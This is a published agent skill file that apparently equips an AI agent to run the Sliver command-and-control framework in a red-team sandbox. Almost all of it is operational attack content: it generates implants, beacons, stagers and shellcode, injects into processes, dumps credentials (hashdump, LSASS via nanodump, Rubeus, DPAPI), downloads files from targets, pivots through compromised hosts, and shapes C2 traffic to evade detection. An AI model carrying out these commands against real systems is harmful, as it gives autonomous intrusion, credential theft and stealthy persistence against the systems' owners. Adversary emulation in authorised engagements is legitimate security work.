c2-sliver

star 0

Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles.

dazeb By dazeb schedule Updated 4/28/2026
play_arrow Run Skill in Manus View GitHub

name: c2-sliver description: "Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles." allowed-tools: Bash Read metadata: subdomain: command-and-control when_to_use: "Sliver, sliver-client, sliver listener, sliver implant, sliver beacon, armory, BOF" tags: c2, sliver, implant, beacon, listener, bof, armory, pivot mitre_attack: T1071, T1573, T1090, T1105, T1572

Sliver C2 Framework

Sliver is an open-source, cross-platform adversary emulation framework by BishopFox. It supports beacon (async) and session (interactive) implants over mTLS, HTTPS, DNS, and WireGuard channels with multi-operator support.

Decepticon Setup

Server: c2-sliver container on sandbox-net (daemon mode, gRPC on port 31337) Client: sliver-client pre-installed in sandbox Config: Auto-generated operator config at /workspace/.sliver-configs/botron.cfg

Connection Procedure (via bash tool)

# 1. Verify C2 reachable
bash(command="nc -z c2-sliver 31337 && echo 'C2_OK' || echo 'C2_DOWN'")

# 2. Import operator config (once — skip if already imported)
bash(command="ls ~/.sliver-client/configs/ 2>/dev/null | grep -q . || sliver-client import /workspace/.sliver-configs/botron.cfg")

# 3. Start interactive console in dedicated tmux session
bash(command="sliver-client console", session="c2")

# 4. Run Sliver commands interactively
bash(command="https --lhost 0.0.0.0 --lport 443 --domain c2-sliver", is_input=True, session="c2")
bash(command="sessions", is_input=True, session="c2")

IMPORTANT:

  • Do NOT generate operator configs manually — use the pre-generated one at /workspace/.sliver-configs/botron.cfg
  • Do NOT start sliver-server in sandbox — the server runs in its own container
  • sliver-client console is interactive — MUST use a dedicated session (e.g. session="c2") and send subsequent commands with is_input=True
  • If "multiple configs found": bash(command="sliver-client console --config ~/.sliver-client/configs/decepticon_c2-sliver.cfg", session="c2")

1. Listener Configuration

All commands below run inside the Sliver console (session="c2", is_input=True).

HTTPS Listener

# Basic HTTPS listener on 443
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver

# HTTPS with custom certificate (better OPSEC)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver \
    --cert /workspace/certs/cert.pem \
    --key /workspace/certs/key.pem

# HTTPS with Let's Encrypt (requires DNS control)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver --lets-encrypt

DNS Listener

# DNS listener — requires NS record pointing to C2 server
dns --domains c2.<TARGET> --lport 53

# Verify DNS resolution
dig @c2-sliver test.c2.<TARGET> TXT +short

mTLS Listener

# mTLS — encrypted, mutual authentication (recommended for internal pivoting)
mtls --lhost 0.0.0.0 --lport 8888

# mTLS on non-standard port
mtls --lhost 0.0.0.0 --lport 8443

WireGuard Listener

# WireGuard tunnel — full network access through implant
wg --lhost 0.0.0.0 --lport 51820

2. Implant Generation

CRITICAL — Compilation Timeout: Sliver's generate command compiles a Go binary from source. This takes 2-10 minutes depending on options. The spinner animation (⠴ Compiling, please wait ...) keeps the screen active, so stall detection will NOT trigger early.

Rules:

  1. ALWAYS use --skip-symbols — reduces compilation time from ~5 min to ~30 sec
  2. ALWAYS use --save <path> — saves implant directly to the target directory. Do NOT rely on the default save location and then cp — file copy may fail on bind-mounted volumes (WSL2/NTFS "Invalid argument" error).
  3. Use a longer timeout for generate commands: bash(command="generate ...", is_input=True, session="c2", timeout=300)

Example (correct):

bash(command="generate --os linux --arch amd64 --mtls c2-sliver:8888 --skip-symbols --save /workspace/exploit/", is_input=True, session="c2", timeout=300)

Beacon (Async)

# Windows beacon via mTLS with jitter
generate beacon --mtls c2-sliver:8888 --os windows --arch amd64 \
    --seconds 30 --jitter 50 --skip-symbols \
    --name win_beacon \
    --save /workspace/exploit/

# Windows beacon via HTTPS
generate beacon --https c2-sliver:443 --os windows --arch amd64 \
    --seconds 60 --jitter 30 --skip-symbols \
    --save /workspace/exploit/

# Linux beacon via DNS (low-and-slow)
generate beacon --dns c2-sliver --os linux --arch amd64 \
    --seconds 120 --jitter 70 --skip-symbols \
    --name lin_dns \
    --save /workspace/exploit/

Session (Interactive)

# Windows session — persistent connection, immediate response
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
    --skip-symbols --name win_session \
    --save /workspace/exploit/

# Linux session via HTTPS
generate --https c2-sliver:443 --os linux --arch amd64 \
    --skip-symbols --name lin_https \
    --save /workspace/exploit/

Stager (Small Initial Payload)

# TCP stager — downloads full implant after initial execution
generate stager --lhost c2-sliver --lport 8443 --protocol tcp \
    --os windows --arch amd64 \
    --save /workspace/exploit/stager.bin

Shellcode (For Custom Loaders)

# Raw shellcode for process injection / custom droppers
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
    --format shellcode --skip-symbols \
    --save /workspace/exploit/shellcode.bin

Output Formats

Format Flag Use Case
EXE --format exe Direct execution
Shared library --format shared DLL sideloading
Shellcode --format shellcode Injection, custom loaders
Service --format service Windows service persistence

OPSEC: Implant Hardening

# Skip debug symbols (smaller, harder to reverse, MUCH faster compile)
generate --mtls c2-sliver:8888 --os windows --skip-symbols

# Limit implant size
generate --mtls c2-sliver:8888 --os windows --format shellcode --skip-symbols

3. Session & Beacon Management

# List active sessions / beacons
sessions
beacons

# Interact with session
use <SESSION_ID>

# Interact with beacon
use <BEACON_ID>

# Background current session
background

# Kill session
sessions -k <SESSION_ID>

# Rename implant
rename -n <NEW_NAME>

4. Post-Implant Operations

Host Reconnaissance

# After `use <SESSION_ID>`
whoami                         # Current user
getuid                         # User ID
getgid                         # Group ID
getprivs                       # Token privileges
info                           # Full implant info

# System enumeration
shell systeminfo
shell ipconfig /all
shell net user
shell net localgroup administrators
shell tasklist /v

# Environment
env
pwd
ls

File Operations

# Download from target
download C:\\Users\\<USER>\\Documents\\sensitive.docx /workspace/post-exploit/loot/

# Upload tool to target
upload /workspace/exploit/implants/SharpHound.exe C:\\Windows\\Temp\\

# List directory
ls C:\\Users\\<USER>\\Desktop\\

Process Operations

# List processes
ps

# Process injection (migrate to another process for stealth)
migrate <PID>

# Execute .NET assembly in memory (no disk touch)
execute-assembly /workspace/tools/Seatbelt.exe -group=all

# Sideload DLL (reflective loading)
sideload /workspace/tools/mimikatz.dll

# Screenshot
screenshot

# Spawn new process
shell notepad.exe

Credential Operations

# Dump SAM hashes (requires SYSTEM/admin)
hashdump

# Kerberos ticket extraction
execute-assembly /workspace/tools/Rubeus.exe dump

# DPAPI credential access
execute-assembly /workspace/tools/SharpDPAPI.exe triage

# Comprehensive host audit
execute-assembly /workspace/tools/Seatbelt.exe -group=all

5. BOF / Armory (In-Memory Extensions)

Beacon Object Files (BOFs) execute position-independent C code in the implant process — no new process creation, no disk writes.

Armory (Package Manager)

# List available extensions
armory

# Install extension from armory
armory install sa-ldapsearch
armory install nanodump
armory install credman
armory install situational-awareness

# Update all installed extensions
armory update

BOF Execution

# LDAP enumeration (no LDAP tool needed on target)
sa-ldapsearch -- "(objectClass=user)"
sa-ldapsearch -- "(objectClass=computer)"

# Process dump with nanodump (LSASS without Mimikatz)
nanodump -w C:\\Windows\\Temp\\debug.dmp

# Credential manager access
credman

# Situational awareness (whoami, env, network)
situational-awareness

Why BOFs Over execute-assembly

Feature BOF execute-assembly
Process creation None (runs in implant) Fork & run (new process)
Disk artifacts None .NET assembly loaded
EDR visibility Low (in-process) Medium (CLR load event)
Size Small (KBs) Larger (full .NET binary)
Flexibility C only Any .NET assembly

6. Network & Pivot Operations

SOCKS5 Proxy

# Route traffic through implant into target network
socks5 start -p 1080

# Use from sandbox with proxychains:
#   proxychains nmap -sT -Pn <INTERNAL_HOST>

Port Forwarding

# Forward local port to remote service through implant
portfwd add -b 127.0.0.1:9090 -r <INTERNAL_HOST>:445

# List active port forwards
portfwd

# Remove forward
portfwd rm -i <ID>

Reverse Port Forwarding

# Expose sandbox service to target network via implant
rportfwd add -b <INTERNAL_HOST>:8080 -r 127.0.0.1:8080

Pivot Listener

# Create pivot listener on compromised host — new implants connect through it
pivots tcp --bind 0.0.0.0:9898

# Generate implant that connects via pivot
generate --tcp-pivot <PIVOT_HOST>:9898 --os windows

WireGuard Pivot

# WireGuard port forward for full tunnel
wg-portfwd add --remote <INTERNAL_HOST>:3389 --bind 127.0.0.1:3389

7. HTTP C2 Profile

Custom profiles shape C2 traffic to mimic legitimate application traffic.

{
    "implant_config": {
        "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "url_parameters": [
            { "name": "session", "value": "{{.GUID}}", "probability": 100 }
        ],
        "headers": [
            { "name": "Accept", "value": "text/html,application/xhtml+xml", "probability": 100 },
            { "name": "Accept-Language", "value": "en-US,en;q=0.9", "probability": 100 }
        ]
    },
    "server_config": {
        "headers": [
            { "name": "Content-Type", "value": "text/html; charset=utf-8", "probability": 100 },
            { "name": "Server", "value": "Microsoft-IIS/10.0", "probability": 100 },
            { "name": "X-Powered-By", "value": "ASP.NET", "probability": 100 }
        ]
    }
}

Save to profiles/sliver_https.json and apply when starting HTTPS listener.

8. Detection Signatures (Sliver-Specific)

Indicator Pattern Mitigation
Default HTTP headers Server: Apache/2.4.x + unique header combo Use custom HTTP C2 profile
Default URI patterns /login.php, /admin/login, /index.php Custom URI paths
mTLS on non-standard ports Outbound to unusual port (8888) Use 443/8443
DNS TXT encoding Base64 TXT > 255 bytes Fragment, short polling
Implant file hashes Known Sliver samples in VirusTotal --skip-symbols, custom loaders
JA3/JA3S fingerprints TLS patterns unique to Sliver Process injection into browser

9. Validation Criteria

  • sliver-client connects to c2-sliver server successfully
  • At least one listener active (HTTPS or mTLS)
  • Implant generated for target OS/architecture
  • Beacon callback confirmed with appropriate jitter
  • Session interaction works (whoami, ps, ls)
  • File upload/download operational
  • BOF execution validated (armory install + run)
  • Pivot infrastructure tested (SOCKS5 or port forward)
  • Backup C2 channel available (DNS fallback)
  • All C2 traffic encrypted

Bundled Resources

References

  • references/sliver-quickstart.md — Compact command reference for Sliver architecture, listeners, implant generation, post-implant ops, pivoting, and OPSEC.
Install via CLI
npx skills add https://github.com/dazeb/botron --skill c2-sliver
Repository Details
star Stars 0
call_split Forks 0
navigation Branch main
article Path SKILL.md
More from Creator
dazeb
dazeb Explore all skills →